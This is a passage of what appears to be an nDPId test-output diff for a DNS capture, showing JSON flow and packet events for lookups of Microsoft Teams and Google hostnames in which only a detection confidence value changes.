{"query":"teams.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.3.128"}} +00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744123792,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.3.128"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123796,"flow_last_seen":1625744123796,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744123796,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1625744123796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1625744123796,"pkt":"ABshv2HAVASmitEsCABFAABM3uAAAEARft4KyAILCAgICN7bADUAOB0s27sBIAABAAAAAAABA2FwaQV0ZWFtcwVza3lwZQNjb20AAAEAAQAAKRAAAAAAAAAA"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123796,"flow_last_seen":1625744123796,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744123796,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": 
{"query":"api.teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123796,"flow_last_seen":1625744123796,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744123796,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1625744123823,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1625744123823,"pkt":"VASmitEsEL9IThY0CABFAADPnR4AADwRxB0ICAgICsgCCwA13tsAu9ue27uBgAABAAQAAAABA2FwaQV0ZWFtcwVza3lwZQNjb20AAAEAAcAMAAUAAQAADJMAHgl0ZWFtcy1hZmQOdHJhZmZpY21hbmFnZXIDbmV0AMAxAAUAAQAAAOwALxx0ZWFtcy1hZmQtdHJhZmZpY21hbmFnZXItbmV0BnMtMDAwNAhzLW1zZWRnZcBKwFsABQABAAAAjQACwHjAeAABAAEAAACNAAQ0ccKDAAApAgAAAAAAAAA="} 
-00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1625744123823,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.131"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1625744123823,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.131"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123828,"flow_last_seen":1625744123828,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123828,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1625744123828,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1625744123828,"pkt":"ABshv2HAVASmitEsCABFAABO3ucAAEARftUKyAILCAgICLQ2ADUAOh0u7g0BIAABAAAAAAABCmFsdDItbXRhbGsGZ29vZ2xlA2NvbQAAAQABAAApEAAAAAAAAAA="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123828,"flow_last_seen":1625744123828,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123828,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123828,"flow_last_seen":1625744123828,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123828,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1625744123853,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1625744123853,"pkt":"VASmitEsEL9IThY0CABFAACB5h8AADwRe2oICAgICsgCCwA1tDYAbSCd7g2BgAABAAIAAAABCmFsdDItbXRhbGsGZ29vZ2xlA2NvbQAAAQABwAwABQABAABUXwAXBGFsdDINbW9iaWxlLWd0YWxrNAFswBfAMwABAAEAAAErAAStwsq8AAApAgAAAAAAAAA="} -00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744123853,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.202.188"}} +00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744123853,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.202.188"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123858,"flow_last_seen":1625744123858,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1625744123858,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1625744123858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1625744123858,"pkt":"ABshv2HAVASmitEsCABFAABT3wQAAEARfrMKyAILCAgICOEgADUAPx0zyVMBIAABAAAAAAABB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAEAACkQAAAAAAAAAA=="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123858,"flow_last_seen":1625744123858,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1625744123858,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123858,"flow_last_seen":1625744123858,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1625744123858,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": 
{"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1625744123885,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1625744123885,"pkt":"VASmitEsEL9IThY0CABFAAFrZGIAADwR\/D0ICAgICsgCCwA14SABV21MyVOBgAABABEAAAABB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAAFAAEAAAECAAwHYW5kcm9pZAFswBzAOAABAAEAAAECAARssQ5lwDgAAQABAAABAgAEbLEOccA4AAEAAQAAAQIABEp9g2XAOAABAAEAAAECAARKfYNxwDgAAQABAAABAgAESn2DZsA4AAEAAQAAAQIABEp9g2TAOAABAAEAAAECAARKfYOKwDgAAQABAAABAgAESn2Di8A4AAEAAQAAAQIABEp9zWXAOAABAAEAAAECAARKfc2LwDgAAQABAAABAgAESn3NZMA4AAEAAQAAAQIABEDpoWbAOAABAAEAAAECAARA6aFlwDgAAQABAAABAgAEQOmhisA4AAEAAQAAAQIABEDppIrAOAABAAEAAAECAARA6aRkAAApAgAAAAAAAAA="} -00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1625744123885,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.177.14.101"}} 
+00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1625744123885,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.177.14.101"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123890,"flow_last_seen":1625744123890,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123890,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1625744123890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1625744123890,"pkt":"ABshv2HAVASmitEsCABFAABO3wwAAEARfrAKyAILCAgICKcmADUAOh0utWIBIAABAAAAAAABASoFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABAAApEAAAAAAAAAA="} 
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123890,"flow_last_seen":1625744123890,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123890,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123890,"flow_last_seen":1625744123890,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123890,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1625744123973,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1625744123973,"pkt":"VASmitEsEL9IThY0CABFAACY7gkAADwRc2kICAgICsgCCwA1pyYAhI+OtWKBgwABAAAAAQABASoFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABwBQABgABAAABKwA+B25zMS0yMDUJYXp1cmUtZG5zwB4TYXp1cmVkbnMtaG9zdG1hc3RlcsAUAAAAAQAADhAAAAEsACTqAAAAASwAACkCAAAAAAAAAA=="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1625744123973,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1625744123973,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123977,"flow_last_seen":1625744123977,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123977,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1625744123977,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1625744123977,"pkt":"ABshv2HAVASmitEsCABFAABS3y4AAEARfooKyAILCAgICKymADUAPh0yDWEBIAABAAAAAAABDHdpZGUteW91dHViZQFsBmdvb2dsZQNjb20AAAEAAQAAKRAAAAAAAAAA"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123977,"flow_last_seen":1625744123977,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123977,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"wide-youtube.l.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123977,"flow_last_seen":1625744123977,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123977,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1625744124006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1625744124006,"pkt":"VASmitEsEL9IThY0CABFAABiUocAADwRDyIICAgICsgCCwA1rKYATu57DWGBgAABAAEAAAABDHdpZGUteW91dHViZQFsBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAASsABEDppMYAACkCAAAAAAAAAA=="} 
-00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1625744124006,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"64.233.164.198"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1625744124006,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"64.233.164.198"}} 
